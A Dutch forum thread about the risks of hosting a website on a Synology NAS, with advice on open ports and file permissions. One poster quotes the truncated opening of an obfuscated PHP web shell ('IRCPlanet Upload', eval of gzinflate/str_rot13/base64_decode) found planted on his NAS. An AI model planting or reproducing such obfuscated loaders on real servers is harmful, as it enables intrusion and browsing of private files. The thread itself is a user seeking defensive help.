veiligheids risico's webserver op nas

[rjant2]

Hallo,

Ik ben ondertussen een half jaartje in het bezit van een synology ds112+.
Ik wil de web server functie een gebruiken voor mijn site. ik vraag me alleen af wat de veiligheids risico's zijn op het moment dat ik een webserver start die van buiten de lan te bereiken is.
Als de site gehackt word kunnen mensen dan bij mijn andere bestanden op de nas ect..

Mijn vraag is dus hoe veilig is het, een website hosten op je nas?

Ik hoop dat jullie antwoord op mijn vraag kunnen geven,
alvast bedankt!

[Matr1x]

Zolang je alleen de poort voor je Web Server (en Photo Station) open zet, kunnen mensen niet zomaar bij je andere gegevens. Tenzij je natuurlijk exotische web pagina's hebt die dit juist wel toestaan.

[rjant2]

Oke, bedankt voor de informatie!!, dan ga ik eens kijken of het mij lukt een webserver op te zetten!

[nikilauda]

Zolang je alleen de poort voor je Web Server (en Photo Station) open zet, kunnen mensen niet zomaar bij je andere gegevens. Tenzij je natuurlijk exotische web pagina's hebt die dit juist wel toestaan.

Hoe kan er dan op mijn NAS plotseling een PHP bestand staan wat er van buitenaf is opgezet.
Hiermee kan men (proberen) de inhoud van de NAS bekijken. Enkele maanden geleden stond er ook zoiets op. je kon er door de gehele NAS bladeren.

Ik heb heel veel gezocht om dit te kunnen voorkomen.
Iemand ideeen???

Dit was het begin van het laatste php bestand
<title>IRCPlanet Upload</title> <?php eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP58VfyHci

[Birdy]

Hoe kan er dan op mijn NAS plotseling een PHP bestand staan wat er van buitenaf is opgezet.

Een lek in je Website zelf misschien ?

Zo te zien komt dit van een gebruiker van KPN vandaan, maar goed, eigenlijk heb je niets aan die info

[Grofweg]

Zolang je alleen de poort voor je Web Server (en Photo Station) open zet, kunnen mensen niet zomaar bij je andere gegevens. Tenzij je natuurlijk exotische web pagina's hebt die dit juist wel toestaan.

Hoe kan er dan op mijn NAS plotseling een PHP bestand staan wat er van buitenaf is opgezet.
Hiermee kan men (proberen) de inhoud van de NAS bekijken. Enkele maanden geleden stond er ook zoiets op. je kon er door de gehele NAS bladeren.

Ik heb heel veel gezocht om dit te kunnen voorkomen.
Iemand ideeen???

Dit was het begin van het laatste php bestand
<title>IRCPlanet Upload</title> <?php eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP58VfyHci

Wat voor een website heb je draaien, WordPress of Joomla? Vaak is dit het gevolg van onjuiste rechteninstelling. Het kan geen kwaad om die zeker even na te lopen.
Wordpress info: http://codex.wordpress.org/Changing_File_Permissions
Joomla info: http://docs.joomla.org/Verifying_permissions

[nikilauda]

Het is een website waar geen CMS op draait maar een in PHP geschreven  logger voor mijn zonnepanelen.

[Grofweg]

Het is een website waar geen CMS op draait maar een in PHP geschreven  logger voor mijn zonnepanelen.

Controleer dan bv met Filezilla wat de rechten zij  per bestand en map.
Zet alle mappen minimaal op 755 en alle bestanden op 644.

[fred54]

Wat bedoel je met:
Zet alle mappen minimaal op 755 en alle bestanden op 644. ?

En een website kan met html geschreven zijn, wat geldt hiervvor?

[Grofweg]

Wat bedoel je met:
Zet alle mappen minimaal op 755 en alle bestanden op 644. ?

Hier vind je daar een aardige uitleg over.

En een website kan met html geschreven zijn, wat geldt hiervvor?

Dit is een bestand, dus daar geldt het zelfde voor als voor php-bestanden.